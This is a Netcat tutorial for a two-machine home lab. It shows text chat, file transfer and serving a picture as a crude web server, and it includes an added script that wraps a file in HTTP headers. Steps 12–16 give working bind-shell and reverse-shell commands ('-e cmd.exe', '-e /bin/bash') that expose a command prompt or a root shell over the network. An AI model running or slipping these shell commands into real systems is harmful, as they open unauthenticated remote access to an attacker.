Netcat is an awesome network tool which can be used for pretty much anything network related. File transfers, remote access, tunneling and network debugging are some of the common tasks it is used for. Netcat is available for both *nix and Windows systems. In this tutorial we are going to be using Netcat as a simple chat client, for file transfers, as a web server and for remote access. We will be using two systems: a Windows 7 client with the IP 192.168.1.100 and a Linux client with the IP 192.168.1.115.
1. Open a command prompt on the Windows client and type nc -lvp 2222
This tells Netcat to Listen Verbosely on Port 2222 (-l, -v and -p). There is no specific reason for using this port; it was just randomly chosen. We will now ask the Linux client to connect to the IP of the Windows client on port 2222.
2. In a Shell from the Linux client type nc 192.168.1.100 2222
3. Type Hello World and press Enter
4. Go back to the Windows Command Prompt and type Hack the Gibson and press Enter
We are able to transfer raw text from one system to another via TCP/IP on a specific port. Let's try transferring a file instead. We do this by telling Netcat on the Linux client to listen verbosely on port 1717 and redirect (>) whatever data is transferred into a file called test.txt. Then we ask Netcat on the Windows client to connect to the IP 192.168.1.115 and feed it (<) a file containing some text, also called test.txt.
5. On the Linux client type nc -lvp 1717 > test.txt
6. On the Windows client create a file called test.txt containing the text This is a test
7. Type nc 192.168.1.115 1717 < test.txt
The data is now transferred and saved to the file test.txt on the Linux client. The connection stays open after the file has been sent, so close it first and then open the file to check that the data arrived.
8. Press Ctrl+C to close the open connection
9. On the Linux client type nano test.txt
We can see that the text This is a test was transferred from the Windows client to the Linux client. Now that we know how to do this, we can try to feed a picture to Netcat listening on port 80, the port normally used for web traffic, and thereby use Netcat as a simple web server. In this tutorial we are using the picture cool.jpg.
10. On the Linux client type nc -lvp 80 < cool.jpg
11. From the Windows client open a web browser and go to http://192.168.1.115/
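Step 10 sends the raw bytes of cool.jpg with no HTTP headers, so the browser has to guess what it received. The following script is an added example, not part of the original tutorial: it wraps the file in a minimal HTTP/1.0 response (Content-Type and Content-Length) before handing it to the same kind of listener; the function names and the port argument are my own.

```shell
#!/bin/sh
# Serve one file as a single, properly framed HTTP response via netcat.
# Added example; assumes a netcat that accepts -l -v -p like the tutorial's.

# Map a file extension to a Content-Type. Unknown extensions fall back to
# application/octet-stream so the browser never has to sniff the body.
content_type() {
    case "$1" in
        *.jpg|*.jpeg) echo "image/jpeg" ;;
        *.png)        echo "image/png" ;;
        *.html|*.htm) echo "text/html" ;;
        *.txt)        echo "text/plain" ;;
        *)            echo "application/octet-stream" ;;
    esac
}

# Print the HTTP/1.0 response header for a file, CRLF-terminated and ending
# with the blank line that separates header from body. Content-Length lets
# the browser know where the body ends instead of waiting for the socket
# to close.
http_headers() {
    file="$1"
    size=$(wc -c < "$file" | tr -d ' ')
    printf 'HTTP/1.0 200 OK\r\n'
    printf 'Content-Type: %s\r\n' "$(content_type "$file")"
    printf 'Content-Length: %s\r\n' "$size"
    printf 'Connection: close\r\n\r\n'
}

# Answer exactly one request: headers, then the file body, then exit.
# Port 80 needs root; any port above 1023 does not.
serve_once() {
    file="$1"
    port="${2:-80}"
    { http_headers "$file"; cat "$file"; } | nc -l -v -p "$port"
}

# Uncomment to serve the tutorial's picture on port 8080 (no root needed):
# serve_once cool.jpg 8080
```

Everything still travels in plaintext with no authentication, so this is a lab convenience rather than something to expose beyond the test network.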
The picture is shown in the web browser. Note that a lot of information about the request is shown in the terminal window, just like a real web server would log web traffic. We are now going to have a look at how to create a remote shell from the Linux client to the Windows client's command prompt. We do this by binding the command prompt to Netcat with the -e cmd.exe parameter. This time we randomly pick port 1337.
12. From the Windows client type nc -lvp 1337 -e cmd.exe
13. From the Linux client type nc 192.168.1.100 1337
We now have a remote shell on the Windows system running via Netcat. Now let's try it the other way around and open a remote shell to the Linux client's bash shell from the Windows client. We do this by binding the bash shell with the -e /bin/bash parameter on port 7777.
14. From the Windows client type nc -lvp 7777
15. From the Linux client type nc -nv 192.168.1.100 7777 -e /bin/bash
16. From the Windows client type pwd to confirm the connection was made
We can see that we are in the /root directory indicating that we do in fact have remote shell access to the Linux client.
Netcat is often referred to as the TCP/IP Swiss Army knife, since its capabilities are limited only by the TCP/IP protocol and your imagination. It's a really handy tool to know how to work with when you are doing anything networking related.